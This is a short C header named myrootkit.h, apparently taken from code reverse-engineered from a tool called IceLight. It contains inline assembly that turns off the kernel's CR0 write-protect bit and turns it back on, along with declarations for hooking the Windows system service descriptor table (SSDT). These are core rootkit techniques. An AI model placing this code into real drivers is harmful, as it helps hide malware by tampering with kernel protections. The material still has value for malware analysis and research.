myrootkit.h

IceLight逆向出来的源代码。 有idb文件和c文件

/*
用于放一些驱动中常用到的函数
*/
//类型定义

typedef ULONG DWORD;
typedef int BOOL;
typedef unsigned short WORD;
typedef ULONG ULONG_PTR, *PULONG_PTR;
//函数声明
ULONG g_uCr0;

_inline void WPOFF()
{
	
    ULONG uAttr;
	
    _asm
    {
        cli
		push eax
        mov eax, cr0
        mov g_uCr0, eax
        and eax, 0FFFEFFFFh // CR0 16 BIT = 0
        mov cr0, eax
        pop eax
        
    };
	
}

_inline void WPON()
{
	
    _asm
    {
        
		push eax
        mov eax, g_uCr0 //恢復原有 CR0 屬性
        mov cr0, eax
        pop eax
		sti
    };
	
}

//一些函数的声明
NTSYSAPI
NTSTATUS
NTAPI
NtWriteFile (
			 IN HANDLE FileHandle,
			 IN HANDLE Event,
			 IN PIO_APC_ROUTINE ApcRoutine,
			 IN PVOID ApcContext,
			 OUT PIO_STATUS_BLOCK IoStatusBlock,
			 IN PVOID Buffer,
			 IN ULONG Length,
			 IN PLARGE_INTEGER ByteOffset,
			 IN PULONG Key
    );

NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile (
			HANDLE FileHandle,
			HANDLE Event,
			PIO_APC_ROUTINE ApcRoutine,
			PVOID ApcContext,
			PIO_STATUS_BLOCK IoStatusBlock,
			ULONG IoControlCode,
			PVOID InputBuffer,
			ULONG InputBufferLength,
			PVOID OutputBuffer,
			ULONG OutputBufferLength
    );

NTSYSAPI
BOOLEAN
NTAPI
KeAddSystemServiceTable (
	IN PULONG_PTR Base,
	IN PULONG Count OPTIONAL,
	IN ULONG Limit,
	IN PUCHAR Number,
	IN ULONG Index
    );

typedef struct _SERVICE_DESCRIPTOR_TABLE_SHADOW
{
	SERVICE_DESCRIPTOR_TABLE SSDT;  // ntoskrnl.exe ( native api )
    SERVICE_DESCRIPTOR_TABLE SSDTShadow;    // win32k.sys (gdi/user support)
	SERVICE_DESCRIPTOR_TABLE UnUsed1;
	SERVICE_DESCRIPTOR_TABLE UnUsed2;
}SERVICE_DESCRIPTOR_TABLE_SHADOW, *PSERVICE_DESCRIPTOR_TABLE_SHADOW;